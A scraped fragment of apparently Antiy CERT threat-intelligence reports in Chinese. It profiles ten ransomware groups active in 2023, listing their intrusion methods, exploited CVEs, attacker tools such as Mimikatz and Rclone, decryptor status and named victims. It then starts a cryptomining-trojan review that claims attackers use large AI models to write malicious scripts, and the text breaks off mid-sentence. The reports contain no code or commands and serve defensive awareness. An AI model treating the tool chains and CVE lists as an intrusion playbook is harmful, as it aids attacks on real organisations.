text
stringlengths
100
9.93M
category
stringclasses
16 values
2023年活跃勒索攻击组织盘点 1.概述 勒索软件(Ransomware)是一种极具破坏性的计算机恶意程序。近年来,它已成为全球组织机构主要的网络安全威胁之一,被威胁行为体作为牟取非法经济利益的犯罪工具。威胁行为体为增加受害方支付勒索赎金的概率和提升赎金金额,从仅恶意加密数据演变为采用“窃取文件+加密数据”双重勒索策略,更有甚者,在双重勒索的基础上增加DDoS攻击和骚扰与受害方有关的第三方等手段,演变为“多重勒索”。一旦遭受勒索软件攻击,组织机构的正常运营将受到严重影响,可能导致业务中断、数据被窃取和恶意加密。威胁行为体以数据恢复和曝光威胁受害方并勒索赎金。数据涵盖文档、邮件、数据库和源代码等多种格式文件;赎金可采用真实货币或虚拟货币(如比特币)。威胁行为体通常设定赎金支付期限,并随时间推移提高金额。有时即使支付赎金,被恶意加密的文件也无法得到完全恢复。 2023年中,勒索攻击事件屡屡发生,威胁行为体通过广撒网式的非定向模式和有针对性的定向模式开展勒索攻击,造成勒索攻击持续活跃的因素之一是勒索软件即服务(Ransomware as a Service,RaaS)商业模式的不断更新。RaaS是勒索攻击组织开发和运营的基础设施,包括定制的破坏性勒索软件、窃密组件、勒索话术和收费通道等。各种攻击组织和个人可以租用RaaS攻击基础设施,完成攻击后与RaaS组织针对赎金进行分赃。这一商业模式的兴起和成熟使勒索攻击的门槛降低,威胁行为体甚至无需勒索软件开发技能就能定向攻击目标。另一因素是初始访问经纪人(Initial Access Broker,IAB)助纣为虐,IAB通过售卖有效访问凭证给威胁行为体实现非法获利,而无需亲自进行攻击。威胁行为体利用获得的凭证,对特定目标进行有针对性的勒索攻击,建立初始访问后展开后续恶意活动,最终实现对目标的勒索行为。 部分勒索攻击组织将受害者信息发布在特定的信息源,如Tor网站或Telegram频道。自2019年以来,据不完全统计,曾发布过受害者信息的不同名称组织约115个。由于各组织资源整合、品牌重塑或被执法机构查封等原因,在2023年中,共有68个不同名称的组织曾发布过受害者信息,涉及约5500个来自不同国家或地区不同行业的组织机构。实际受害者数量可能更多,因为威胁行为体出于某些原因可能选择不公开或删除信息,例如协商谈判达成一致或受害者支付赎金。 2023年发布受害者信息的组织: 0mega 8base Abyss Akira Alphv/BlackCat Arvinclub AvosLocker BianLian Black Basta BlackByte BlackSuit Cactus CiphBit Cloak Clop CrossLock CryptNet Cuba Cyclops Daixin DarkPower DarkRace Donut Dragonforce Dunghill Leak Everest Hive Hunters INCransom Karakurt Knight La Piovra LockBit Lorenz LostTrust Malas MalekTeam Mallox Medusa MedusaLocker Meow MetaEncryptor MoneyMessage Monti NoEscape Nokoyawa Play QiLin RaGroup RagnarLocker RanStreet Rancoz RansomEXX RansomHouse Ransomedvc Raznatovic Rhysida Royal Siegedsec Snatch Stormous Threeam Toufan Trigona Unsafe Vendetta Vice Society WereWolves 目前,勒索攻击的主流威胁形式已经演变为RaaS+定向攻击收取高额赎金的运行模式。全球范围内,制造、医疗、建筑、能源、金融和公共管理等行业频繁成为勒索攻击的目标,给全球产业产值造成严重损失。 2.勒索攻击行为分类 2023年活跃的勒索攻击行为主要有以下三类: 加密文件 采用此类勒索攻击方式的威胁行为体会使用勒索软件执行体对数据文件进行加密,执行体通过特定加密算法(如AES、RSA、ChaCha20和Salsa20等)组合利用对文件进行加密,大多数被加密文件在未得到对应密钥的解密工具时,暂时无法解密,只有少部分受害文件因勒索软件执行体存在算法逻辑错误而得以解密。 窃取文件 采用此类勒索攻击方式的威胁行为体不使用勒索软件执行体对数据文件进行加密,仅在目标系统内驻留并窃取数据文件,窃密完成后通知受害者文件被窃取,如不按期支付勒索赎金,则会公开或出售窃取到的数据文件,给予受害者压力,从而迫使受害者尽早支付赎金。 窃取文件+加密文件 采用此类勒索攻击方式的威胁行为体发动勒索攻击前,会在目标系统内驻留一段时间,在此期间窃取数据文件,在窃取工作完成后会投放勒索软件执行体,加密系统中的文件,并通知受害者文件被窃取,如不按期支付勒索赎金,不仅现有网络环境中的文件因被加密而无法使用,而且还会公开或出售窃取到的数据文件,给予受害者压力,从而迫使受害者尽早支付赎金。 3.2023年活跃勒索攻击组织盘点 回顾2023年发生的勒索软件攻击事件,对活跃的勒索攻击组织进行盘点,包括组织基本信息、组织概览和相关案例,按组织名称首字母排序,排名不分先后。 3.1 8Base 8Base勒索软件被发现于2022年3月,勒索软件执行体是基于Phobos勒索软件的变种版本,其背后的攻击组织采用RaaS和双重勒索的模式运营,疑似为RansomHouse勒索攻击组织的分支或品牌重塑,通过RaaS和勒索赎金分成获利,使用该勒索软件的威胁行为体在非定向和定向模式下开展勒索攻击。该勒索攻击组织主要通过漏洞武器化、有效访问凭证和搭载其他恶意软件等方式对目标系统突防,常利用SmokeLoader木马实现对目标系统的初始访问。目前暂未发现公开的解密工具。 在2023年中,其受害者信息发布及数据泄露平台留有已发布约200名受害者信息,实际受害者数量可能更多。 3.1.1 组织概览 组织名称 8Base 出现时间 2022年3月 典型突防方式 有效访问凭证、搭载其他恶意软件 典型加密后缀 .8base 解密工具 目前暂未发现公开的解密工具 加密目标系统 Windows 运营方式 勒索即服务、基于勒索赎金和贩卖数据 侵害模式 加密致瘫、窃密、公开或贩卖数据 常见针对行业 金融业、制造业、服务业、医疗业、建筑业 常见国家/地区 美国、巴西、英国、加拿大、澳大利亚、德国、印度 3.1.2 相关案例 印度医疗行业Clear Medi公司被8Base勒索攻击组织列为受害者 7月3日,8Base勒索攻击组织将Clear Medi列为受害者,声称窃取与员工、患者、保险和财务等相关文件,现已公开。 美国丰田叉车经销商ToyotaLift Northeast公司被8Base勒索攻击组织列为受害者 8月23日,8Base勒索攻击组织将ToyotaLift Northeast列为受害者,声称窃取与通信、客户、财务和涉密等相关文件,现已公开。 3.2 Akira Akirasup[1]勒索软件被发现于2023年3月,其背后的攻击组织通过RaaS和双重勒索的模式运营该勒索软件,以RaaS模式经营和勒索赎金分成等方式实现获利,勒索赎金分别为用于解密被加密文件和删除被窃取的数据两部分,使用该勒索软件的威胁行为体在非定向和定向模式下开展勒索攻击。该勒索攻击组织主要通过有效访问凭证、未配置多重身份验证(MFA)的VPN账户和漏洞武器化等方式对目标系统突防,曾利用思科VPN相关漏洞CVE-2023-20269实现对目标系统的初始访问。在建立与目标系统初始访问后,利用多种第三方工具作为攻击装备以实现其他恶意行为,例如使用AnyDesk远程控制计算机和传输文件,使用PowerTool关闭与杀毒软件有关的进程,使用PCHunter、Masscan和AdFind获取特定信息,使用Mimikatz窃取凭证,使用Rclone和FileZilla窃取数据等行为。 Akira勒索软件具备针对Windows、Linux和VMware等目标系统的执行体。除了“窃密+加密”的行为,还存在只窃密不加密的模式,在完成对受害系统数据窃取后,威胁行为体选择不投放勒索软件执行体,而是通过窃取到的数据威胁受害者进行勒索。国外安全厂商Avast发现Akira勒索软件存在漏洞[2],并于6月29日发布了解密工具,但该工具只适用于6月29日前的Akira勒索软件执行体版本,因为Akira勒索软件开发人员在此后修复了漏洞。 Akira勒索攻击组织与之前退出勒索软件市场的Conti勒索攻击组织疑似存在关联,体现在勒索软件执行体的部分代码段和加密数字货币钱包地址等方面。2023年中,其受害者信息发布及数据泄露平台留有已发布约142名受害者信息和窃取到的数据,实际受害者数量可能更多。 3.2.1 组织概览 组织名称 Akira 出现时间 2023年3月 典型突防方式 有效访问凭证、未配置多重身份验证的账户、漏洞武器化 典型加密后缀 .akira 解密工具 部分版本存在公开解密工具(6月29日前被加密文件存在解密可能) 加密目标系统 Windows、Linux、VMware ESXi 运营方式 勒索即服务、基于两部分勒索赎金(解密文件和删除被窃数据)和贩卖数据 侵害模式 加密致瘫、窃密、公开或贩卖数据 常见针对行业 服务业、教育业、制造业、金融业、医疗业、公共管理 常见国家/地区 美国、法国、英国、加拿大、澳大利亚、荷兰 3.2.2 相关案例 Akira勒索攻击组织针对未配置多重身份验证的思科VPN用户发动攻击 8月24日,思科发布公告[3]指出Akira勒索攻击组织针对未配置多重身份验证的思科VPN用户发动攻击。在针对VPN的攻击活动中,威胁行为体首先是利用暴露的服务或应用程序,针对VPN账号未配置多重身份验证和VPN软件中的存在漏洞的用户发动攻击。一旦威胁行为体明确了目标网络的基本情况,将尝试通过LSASS(本地安全认证子系统服务)的转储来提取凭据,以便在目标网络环境中进一步移动和提权。 荷兰库拉索岛政府所有供水供电公司Aqualectra被Akira勒索攻击组织列为受害者 12月6日,Akira勒索攻击组织将荷兰库拉索岛政府所有供水供电公司Aqualectra列为受害者,威胁行为体声称即将公开从该公司窃取到的运营文件、业务文件和大量付款信息等,预计对80000个家庭和公司的隐私造成影响。 3.3 BianLian BianLian勒索软件被发现于2022年6月,其背后的攻击组织通过RaaS和双重勒索的模式运营该勒索软件,以RaaS模式经营和勒索赎金分成等方式实现获利,使用该勒索软件的威胁行为体在非定向和定向模式下开展勒索攻击。该勒索攻击组织主要通过有效访问凭证和漏洞武器化等方式对目标系统突防,曾利用SonicWall VPN设备和Microsoft Exchange软件的CVE-2021-31207、CVE-2021-34473、CVE-2021-34523漏洞实现对目标系统的初始访问。威胁行为体利用突防手段实现对目标系统的初始访问后,投放一个Go语言编译的后门木马,安装远程控制的第三方工具用于实现后续恶意行为,例如TeamViewer、SplashTop和AnyDesk等。2023年1月,国外安全厂商Avast发布用于BianLian勒索软件的解密工具[4],随后,BianLian勒索攻击组织转变策略,放弃加密执行体,只通过窃取数据文件实现勒索攻击。 当前,其受害者信息发布及数据泄露平台留有已发布的223名受害者信息和窃取到的数据,2023年中留有143名受害者信息,实际受害者数量可能更多。 3.3.1 组织概览 组织名称 BianLian 出现时间 2022年6月 典型突防方式 有效访问凭证、漏洞武器化 典型加密后缀 .bianlian 解密工具 2023年1月前被加密文件可解密,后续转为只窃密不加密 加密目标系统 Windows 运营方式 勒索即服务、基于勒索赎金和贩卖数据 侵害模式 加密致瘫、窃密、公开或贩卖数据 常见针对行业 医疗业、金融业、制造业、教育业、服务业、公共管理 常见国家/地区 美国、澳大利亚、英国、加拿大、印度尼西亚 3.3.2 相关案例 美国韦恩斯伯勒市被BianLian勒索攻击组织列为受害者 3月,BianLian勒索攻击组织将美国韦恩斯伯勒市列为受害者,威胁行为体声称窃取约350 GB数据,包括警察局内部文件、个人及员工信息和商业等相关文件,现已公开。 印度尼西亚电信运营商Smartfren Telecom被BianLian勒索攻击组织列为受害者 9月,BianLian勒索攻击组织将印度尼西亚电信运营商Smartfren Telecom列为受害者,威胁行为体声称窃取约1.2 TB数据,包括个人数据、财务金融、业务运营、邮件及保密等相关文件,现已公开。 加拿大航空公司Air Canada被BianLian勒索攻击组织列为受害者 10月,BianLian勒索攻击组织将加拿大航空公司Air Canada列为受害者,威胁行为体声称窃取约210 GB数据,包括2008年至2023年间的技术和运营数据、SQL数据库备份数据和员工个人信息等相关文件,现已公开。 3.4 Black Basta Black Basta勒索软件被发现于2022年4月,其背后的攻击组织通过RaaS和双重勒索的模式运营该勒索软件,由于Black Basta所使用的每个勒索软件执行体都硬编码一个唯一的识别码,故猜测该组织仅采用定向模式开展勒索攻击活动。该勒索攻击组织主要通过有效访问凭证、搭载其他恶意软件和漏洞武器化等方式对目标系统突防。该组织成员在地下论坛发帖寻求组织机构的网络访问凭证,曾利用QBot木马和PrintNightmare相关漏洞CVE-2021-34527实现对目标系统的初始访问。在建立与目标系统初始访问后,利用多种第三方工具作为攻击装备以实现其他恶意行为,例如使用AnyConnect和TeamViewer建立远程链接,使用PsExec执行命令,使用Netcat进行扫描,使用Mimikatz转储凭证,使用Rclone窃取数据等恶意行为。2023年12月,国外网络安全研究机构Security Research发布一个名为“Black Basta Buster”的解密工具[5],用于恢复被Black Basta勒索软件加密的文件,但该工具仅适用于2022年11月至2023年12月期间的部分勒索软件变种版本。 Black Basta勒索攻击组织与之前退出勒索软件市场的BlackMatter和Conti勒索攻击组织疑似存在关联,体现在勒索软件执行体部分代码段,受害者信息发布及数据泄露站点设计风格,通信方式和勒索谈判话术等方面。故猜测Black Basta勒索攻击组织可能是BlackMatter和Conti勒索软件组织的分支或品牌重塑。在2023年中,其受害者信息发布及数据泄露平台留有已发布的约150名受害者信息,实际受害者数量可能更多。 3.4.1 组织概览 组织名称 Black Basta 出现时间 2022年4月 典型突防方式 有效访问凭证、搭载其他恶意软件漏洞武器化 典型加密后缀 .basta 解密工具 2022年11月至2023年12月期间部分变种版本存在解密可能 加密目标系统 Windows、Linux、VMware ESXi 运营方式 勒索即服务、基于勒索赎金和贩卖数据 侵害模式 加密致瘫、窃密、公开或贩卖数据 常见针对行业 制造业、医疗业、建筑业、服务业、金融业、公共管理 常见国家/地区 美国、加拿大、英国、澳大利亚、新西兰、德国 3.4.2 相关案例 美国维京可口可乐瓶装公司被Black Basta勒索攻击组织列为受害者 5月,Black Basta勒索攻击组织将美国维京可口可乐瓶装公司列为受害者,威胁行为体公开展示窃取到的数据文件示例,包括员工信息表、身份证、护照申请记录、保密协议和付款记录等文件,现已公开。 德国国防工业Rheinmetall集团被Black Basta勒索攻击组织列为受害者 5月,Black Basta勒索攻击组织将德国国防工业Rheinmetall集团列为受害者,威胁行为体公开展示窃取到的数据文件示例,包括员工个人信息、保密协议、授权书、设计图纸和采购合同等文件,现已公开。 电子和电气连接线生产厂商Volex被Black Basta勒索攻击组织列为受害者 10月,Black Basta勒索攻击组织将总部位于英国的电子和电气连接线生产厂商Volex列为受害者,威胁行为体公开展示窃取到的数据文件示例,包括员工身份证、就诊记录、录用通知书、保密协议和产品图纸等文件,现已公开。 3.5 BlackCat BlackCat(又称ALPHV或Noberus)勒索软件[6]被发现于2021年11月,其背后的攻击组织通过RaaS和多重勒索的模式运营该勒索软件,主要以RaaS模式经营和勒索赎金分成等方式实现获利,使用该勒索软件的威胁行为体在非定向和定向模式下开展勒索攻击。该组织于2023年2月21日发布名为“Sphynx”的2.0版本。该勒索攻击组织主要通过漏洞武器化和有效的访问凭证等方式对目标系统突防。BlackCat勒索攻击组织采用多种手段迫使受害者支付赎金,包括向受害者主管单位举报、DDoS攻击和骚扰受害单位相关人员。2023年12月,美国联邦调查局与多方执法机构合作,成功查处BlackCat组织用于勒索攻击的基础设施,关闭发布受害者信息的网站,并提供解密受害者被加密文件的密钥,有望帮助500多名受害者恢复文件[7]。 BlackCat勒索软件与已经退出勒索软件市场的REvil、DarkSide和BlackMatter勒索软件存在关联,是第一个使用Rust编程语言开发跨平台攻击载荷的勒索软件,其载荷支持在Windows、Linux和VMware ESXi系统上执行。其受害者信息发布及数据泄露平台陆续发布受害者信息和窃取到的数据,在2023年内发布约410名受害者信息,实际受害者数量可能更多。 3.5.1 组织概览 组织名称 BlackCat(又称ALPHV或Noberus) 出现时间 2021年11月 典型突防方式 漏洞武器化、有效访问凭证 典型加密后缀 .(6-7位数字+字母组合随机) 解密工具 受害者需与FBI进行联系(查获500多名受害者密钥) 加密目标系统 Windows、Linux、VMware ESXi 运营方式 勒索即服务,基于勒索赎金和贩卖数据 侵害模式 加密致瘫、窃密、公开或贩卖数据、DDoS干扰、骚扰涉事第三方 常见针对行业 制造业、服务业、教育业、医疗业、金融业、公共管理 常见国家/地区 美国、澳大利亚、印度、印度尼西亚、英国、墨西哥 3.5.2 相关案例 墨西哥饮料公司Coca-Cola FEMSA被BlackCat勒索攻击组织列为受害者 6月,BlackCat勒索攻击组织将墨西哥饮料公司Coca-Cola FEMSA列为受害者,威胁行为体公开展示窃取到的数据文件示例,示例图片内容为Coca-Cola FEMSA公司与合作公司的订单信息、交易合同和利润分成合同等文件,现已公开。 美国社交新闻网站Reddit被BlackCat勒索攻击组织列为受害者 6月,BlackCat勒索攻击组织将美国社交新闻网站Reddit列为受害者,威胁行为体声称于2月5日入侵到Reddit的系统中,事件起因是Reddit员工遭受具有针对性的网络钓鱼攻击,威胁行为体窃取了80 GB压缩后的数据。威胁行为体想要450万美元作为赎金,并且要求Reddit撤回关于API定价上调的决定。 美国美高梅国际酒店集团遭受BlackCat攻击 9月,BlackCat勒索攻击组织将美国美高梅国际酒店集团(MGM Resorts International)列为受害者,本次事件是位于拉斯维加斯的酒店和赌场运营设施遭受BlackCat勒索软件攻击,导致酒店住房系统和赌场娱乐设施系统无法运营,迫使客人等待数小时才能办理入住,电子支付、数字钥匙卡、老虎机、自动取款机和付费停车系统瘫痪。 3.6 Clop Clop(又称Cl0p)勒索软件被发现于2019年2月,其背后的攻击组织通过RaaS和双重勒索的模式运营该勒索软件,主要以RaaS模式经营和勒索赎金分成等方式实现获利。使用该勒索软件的威胁行为体在非定向和定向模式下开展勒索攻击,在部分攻击活动中只通过窃取数据文件实现勒索攻击。该勒索攻击组织主要通过有效访问凭证和漏洞武器化等方式对目标系统突防,曾利用Accellion(现名Kiteworks)公司文件传输设备(FTA),SolarWinds公司Serv-U托管文件传输(MFT),Fortra公司GoAnywhere MFT和Progress公司MOVEit MFT等产品的相关漏洞实现对目标系统的初始访问。在建立与目标系统初始访问后,利用多种第三方工具作为攻击装备以实现其他恶意行为。SentinelLabs发现Clop勒索软件的部分Linux变种版本可支持解密[8],因勒索软件执行体加密算法存在缺陷。其他变种版本暂未发现公开的解密工具。 在2023年中,其受害者信息发布及数据泄露平台留有已发布的约353名受害者信息,实际受害者数量可能更多。 3.6.1 组织概览 组织名称 Clop(又称Cl0p) 出现时间 2019年2月 典型突防方式 漏洞武器化、有效访问凭证 典型加密后缀 .clop 解密工具 部分Linux版本下的勒索软件执行体变种可解密 加密目标系统 Windows、Linux、VMware ESXi 运营方式 勒索即服务、基于勒索赎金和贩卖数据 侵害模式 加密致瘫、窃密、公开或贩卖数据 常见针对行业 金融业、服务业、医疗业、教育业、公共管理 常见国家/地区 美国、加拿大、印度、英国、荷兰 3.6.2 相关案例 Clop勒索攻击组织利用MOVEit相关漏洞发动大规模勒索攻击 Clop勒索攻击组织利用MOVEit产品相关漏洞,对使用该产品的用户发动勒索攻击,威胁行为体在本次事件中,多采用只窃密不加密的策略,其声称受害者包括安永(EY)会计师事务所、德勤(DTT)会计师事务所、普华永道(PwC)会计师事务所、保险业怡安(Aon)集团,化妆品行业雅诗兰黛集团等,窃取到的数据已公开下载方式。 3.7 LockBit LockBit勒索软件[9]被发现于2019年9月,初期因其加密后的文件名后缀为.abcd,而被称为ABCD勒索软件;其背后的攻击组织通过RaaS和多重勒索的模式运营该勒索软件,主要通过RaaS和勒索赎金分成获利,使用该勒索软件的威胁行为体在非定向和定向模式下开展勒索攻击。该组织在2021年6月发布了勒索软件2.0版本,增加了删除磁盘卷影和日志文件的功能,同时发布专属数据窃取工具StealBit,采用双重勒索策略;2021年8月,该组织的攻击基础设施频谱增加了对DDoS攻击的支持;2022年6月勒索软件更新至3.0版本,由于3.0版本的部分代码与BlackMatter勒索软件代码重叠,因此LockBit 3.0又被称为LockBit Black,这反映出不同勒索攻击组织间可能存在的人员流动、能力交换等情况。使用LockBit RaaS实施攻击的相关组织进行了大量攻击作业,通过有效访问凭证、漏洞武器化和搭载其他恶意软件等方式实现对目标系统的初始访问。LockBit勒索软件仅对被加密文件头部的前4K数据进行加密,因此加密速度明显快于全文件加密的其他勒索软件,由于在原文件对应扇区覆盖写入,受害者无法通过数据恢复的方式来还原未加密前的明文数据。目前暂未发现公开的解密工具。 2023年10月,波音公司被LockBit勒索攻击组织列为受害者,安天CERT从攻击过程还原、攻击工具清单梳理、勒索样本机理、攻击致效后的多方反应、损失评估、过程可视化复盘等方面开展了分析工作,并针对事件中暴露的防御侧问题、RaaS+定向勒索的模式进行了解析,并提出了防御和治理方面的建议[10]。在2023年中,其受害者信息发布及数据泄露平台发布约1030名受害者信息和窃取到的数据,实际受害者数量可能更多。 3.7.1 组织概览 组织名称 LockBit 出现时间 2019年9月 典型突防方式 有效访问凭证、漏洞武器化、搭载其他恶意软件 典型加密后缀 字母与数字随机组合的9位个人ID 解密工具 目前暂未发现公开的解密工具 加密目标系统 Windows、Linux、macOS、VMware ESXi 运营方式 勒索即服务、基于勒索赎金和贩卖数据 侵害模式 加密致瘫、窃密、公开或贩卖数据、DDoS干扰 常见针对行业 金融业、服务业、建筑业、教育业、制造业 常见国家/地区 美国、英国、德国、加拿大、印度、日本 3.7.2 相关案例 英国皇家邮政被LockBit勒索攻击组织列为受害者 2月,LockBit勒索攻击组织将英国皇家邮政列为受害者,勒索攻击事件发生于1月,本次事件导致英国皇家邮政的国际出口服务受到干扰,暂时无法将物品运送到海外目的地。威胁行为体公开了与英国皇家邮政的谈判记录,并表明最后的赎金为4000万美元,用于恢复被加密文件及删除窃取到的数据,由于未能按时支付赎金,现已公开窃取到的约44.4 GiB数据,该组织在其数据泄露平台采用GiB数据计量单位,1 GiB约等于1.07 GB。 名古屋港口遭受LockBit勒索攻击组织攻击 7月,日本名古屋港口遭受LockBit勒索攻击组织攻击[11],本次事件对名古屋港统一终端系统造成影响,该系统是控制港口所有集装箱码头的中央系统,从而导致集装箱搬运工作无法进行、港口中五个码头停运近三天,影响大约2万个集装箱进出港和260家相关企业。丰田汽车主要通过该港口进行货物运输,在此期间部分装有进出口零件的集装箱无法装卸。 波音公司遭受LockBit勒索攻击组织攻击 10月,LockBit所属的受害者信息发布平台发消息声称窃取了波音公司的大量敏感数据,并以此胁迫波音公司,如果不在2023年11月2日前与LockBit组织取得联系,将会公开窃取到的敏感数据。此后可能因双方谈判失败,LockBit组织公开发布从波音公司窃取到的21.6 GiB数据。 3.8 Medusa Medusa勒索软件被发现于2021年6月,与2019年出现的MedusaLocker勒索软件无关,其背后的攻击组织采用RaaS和双重勒索的模式运营,主要通过RaaS和勒索赎金分成获利,使用该勒索软件的威胁行为体在非定向和定向模式下开展勒索攻击。该勒索攻击组织主要通过漏洞武器化、有效访问凭证和远程桌面协议暴力破解等方式对目标系统突防。目前暂未发现公开的解密工具。 在2023年中,其受害者信息发布及数据泄露平台留有已发布的约140名受害者信息,实际受害者数量可能更多。 3.8.1 组织概览 组织名称 Medusa 出现时间 2021年6月 典型突防方式 漏洞武器化、有效访问凭证 典型加密后缀 .MEDUSA 解密工具 目前暂未发现公开的解密工具 加密目标系统 Windows 运营方式 勒索即服务、基于勒索赎金和贩卖数据 侵害模式 加密致瘫、窃密、DDoS干扰、公开和贩卖窃密数据 常见针对行业 制造业、教育业、服务业、金融业、建筑业、公共管理 常见国家/地区 美国、英国、加拿大、印度、土耳其、澳大利亚、汤加、意大利 3.8.2 相关案例 汤加电信公司被Medusa勒索攻击组织列为受害者 2月,Medusa勒索攻击组织将汤加电信公司列为受害者,威胁行为体公开展示窃取到的数据文件示例,包括员工身份证、业务往来和保密协议等文件,现已公开。 意大利自来水供应商Alto Calore Servizi S.p.A被Medusa勒索攻击组织列为受害者 5月,Medusa勒索攻击组织将意大利自来水供应商Alto Calore Servizi S.p.A列为受害者,威胁行为体公开展示窃取到的数据文件示例,包括人员信息、供水管线信息、施工图纸和施工计划等文件,现已公开。 丰田金融服务公司Toyota Financial被Medusa勒索攻击组织列为受害者 11月,Medusa勒索攻击组织将丰田金融服务公司Toyota Financial列为受害者,威胁行为体公开展示窃取到的数据文件示例,包括员工身份证、公司财务报表、车辆评估信息和商业合同等文件,现已公开。 3.9 Play Play(又称PlayCrypt)勒索软件[12]被发现于2022年6月,其背后的攻击组织通过双重勒索的模式运营该勒索软件,并声称不通过RaaS模式运营,使用该勒索软件的威胁行为体在非定向和定向模式下开展勒索攻击。该勒索攻击组织主要通过有效访问凭证和漏洞武器化等方式对目标系统突防,曾利用ProxyNotShell、Microsoft Exchange Server和FortiOS相关漏洞实现对目标系统的初始访问。目前暂未发现公开的解密工具。 Play勒索攻击组织疑似与Conti、Royal、Hive和Nokoyawa勒索攻击组织存在关联,体现在用于攻击的基础设施和勒索攻击活动中所使用的技战术等方面。在2023年中,其受害者信息发布及数据泄露平台留有已发布的约213名受害者信息,实际受害者数量可能更多。 3.9.1 组织概览 组织名称 Play(又称PlayCrypt) 出现时间 2022年6月 典型突防方式 有效访问凭证、漏洞武器化 典型加密后缀 .play 解密工具 目前暂未发现公开的解密工具 加密目标系统 Windows 运营方式 自称不采用RaaS、基于勒索赎金和贩卖数据 侵害模式 加密致瘫、窃密、DDoS干扰、公开和贩卖窃密数据 常见针对行业 电信业、医疗业、服务业、金融业、教育业、房地产业 常见国家/地区 德国、美国、英国、澳大利亚、葡萄牙、瑞士 3.9.2 相关案例 瑞士媒体公司CH Media被Play勒索攻击组织列为受害者 4月,Play勒索攻击组织将瑞士媒体公司CH Media列为受害者,威胁行为体声称窃取到500 GB数据文件,包括机密资料、项目工程、员工薪资和员工信息等文件,现已公开。 瑞士IT服务提供商Xplain被Play勒索攻击组织列为受害者 5月,Play勒索攻击组织将瑞士IT服务提供商Xplain列为受害者,威胁行为体声称窃取到907 GB数据文件。6月,瑞士警方针对该事件开始调查,因为该公司为多个联邦和州政府部门、军队、海关和警察局提供服务,多个单位间接受到此次事件的影响。 美国达拉斯市被Play勒索攻击组织列为受害者 10月,Play勒索攻击组织将美国达拉斯市列为受害者,威胁行为体声称窃取到400 GB数据文件,文件为该市的私人文件,现已公开。 3.10 Rhysida Rhysida勒索软件被发现于2023年5月,其背后的攻击组织通过RaaS和双重勒索的模式运营该勒索软件,以RaaS模式经营和勒索赎金分成等方式实现获利,使用该勒索软件的威胁行为体在非定向和定向模式下开展勒索攻击。该勒索攻击组织主要通过有效访问凭证和漏洞武器化等方式对目标系统突防,曾利用Microsoft Netlogon漏洞CVE-2020-1472实现对目标系统的初始访问。目前暂未发现公开的解密工具。 Rhysida勒索攻击组织与Vice Society勒索攻击组织存在关联,猜测Rhysida可能为Vice Society的分支或品牌重塑。在2023年中,其受害者信息发布及数据泄露平台留有已发布的约76名受害者信息,实际受害者数量可能更多。 3.10.1 组织概览 组织名称 Rhysida 出现时间 2023年5月 典型突防方式 有效访问凭证、漏洞武器化 典型加密后缀 .rhysida 解密工具 目前暂未发现公开的解密工具 加密目标系统 Windows、Linux、VMware ESXi 运营方式 勒索即服务、基于勒索赎金和贩卖数据 侵害模式 加密致瘫、窃密、公开和贩卖窃密数据 常见针对行业 制造业、医疗业、制造业、教育业、服务业、公共管理 常见国家/地区 美国、英国、印度尼西亚、德国、巴西、智利 3.10.2 相关案例 智利陆军Ejercito de Chile被Rhysida勒索攻击组织列为受害者 5月,Rhysida勒索攻击组织将智利陆军Ejercito de Chile列为受害者,智利陆军是智利武装部队中负责智利国土防卫的分支。威胁行为体声称窃取到220 GB数据文件,共26862个文件,并表明未出售的部分将被公开。 英国国家图书馆British Library被Rhysida勒索攻击组织列为受害者 11月,Rhysida勒索攻击组织将大英图书馆British Library列为受害者,威胁行为体声称窃取到573 GB数据文件,共490191个文件,要求受害者支付20 BTC作为勒索赎金。
blog
2023年活跃挖矿木马盘点 时间 : 2024年01月29日 来源: 安天CERT 1.概述 挖矿木马通过各种手段将挖矿程序植入受害者的计算机中,在用户不知情的情况下,利用受害者计算机的运算能力进行挖矿,从而获取非法收益。目前已知多个威胁组织(例如,H2Miner、“8220”等)传播挖矿木马,致使用户系统资源被恶意占用和消耗、硬件寿命被缩短,严重影响用户生产生活,妨害国民经济和社会发展。2023年,安天CERT发布了多篇针对挖矿木马的分析报告,现将2023年典型的挖矿木马梳理形成组织/家族概览,进行分享。 挖矿木马组织/家族 出现时间 针对平台 “8220”2017年 Windows、Linux Outlaw 2018年 Linux WatchDog 2019年1月 Windows、Linux TeamTNT 2019年10月 Linux H2Miner 2019年12月 Windows、Linux Sysry-hello 2020年12月 Windows、Linux libgcc_a/warmup 2021年8月 Windows、Linux Kthmimu 2022年3月 Windows、Linux aminer 2022年6月 Linux Diicot/color1337/Mexals 2022年10月 Linux 2.挖矿木马的危害 1. 加重信息系统基础设施资源消耗与运行风险:挖矿木马普遍消耗信息系统基础设施的大量资源,使操作系统及其服务、应用软件运行缓慢,甚至造成正常服务崩溃,产生承载业务中断、业务数据丢失等一系列负面影响; 2. 危害信息系统基础设施使用寿命与运行性能:挖矿木马迫使信息系统基础设施长时间高负载运行,致使其使用寿命缩短,运行性能严重下降; 3. 浪费能源,增大碳排放量:挖矿木马挖矿会消耗大量电能,造成巨大的能源消耗,而现阶段我国电能的主要来源是煤炭类化石燃料燃烧供电,因此,其挖矿作业加剧碳排放污染; 4. 留置后门,衍生僵尸网络:挖矿木马普遍具有添加SSH免密登录后门、安装RPC后门,接收远程IRC服务器指令、安装Rootkit后门等恶意行为,致使受害组织网络沦为僵尸网络; 5. 作为攻击跳板,攻击其他目标:挖矿木马支持攻击者控制受害者服务器进行DDoS攻击,以此服务器为跳板,攻击其他计算机,或者释放勒索软件索要赎金等。 3.3 挖矿木马趋势 3.1 AI时代驱动挖矿木马新浪潮 2023年,随着以ChatGPT为首的大模型人工智能技术的不断成熟和普及,利用大模型发起网络攻击使得网络安全变得更加严峻。特别是在挖矿木马领域,这种以非法利用计算资源进行加密货币挖矿的恶意软件,正在经历一场由AI技术驱动的变革。在这一背景下,部分主要依靠开源工具或脚本的攻击者开始崛起,他们利用人工智能为其编写和优化攻击脚本,使得挖矿木马攻击对网络环境构成严重的网络安全威胁。攻击者借助AI的强大能力,可以快速生成大量的变种恶意脚本,这些脚本往往作为挖矿木马的前导文件,用以准备环境、规避检测或执行实际的挖矿操作。AI的介入显著降低了编写高级恶意脚本的技术门槛,即使是技术能力相对较低的攻击者,也能够在网络空间制造出广泛的影响。 3.2 内核级工具使挖矿木马更加难以检测 在2023年的挖矿取证中,安天CERT发现挖矿木马攻击者正日益倾向于使用Rootkit内核级工具,如yayaya 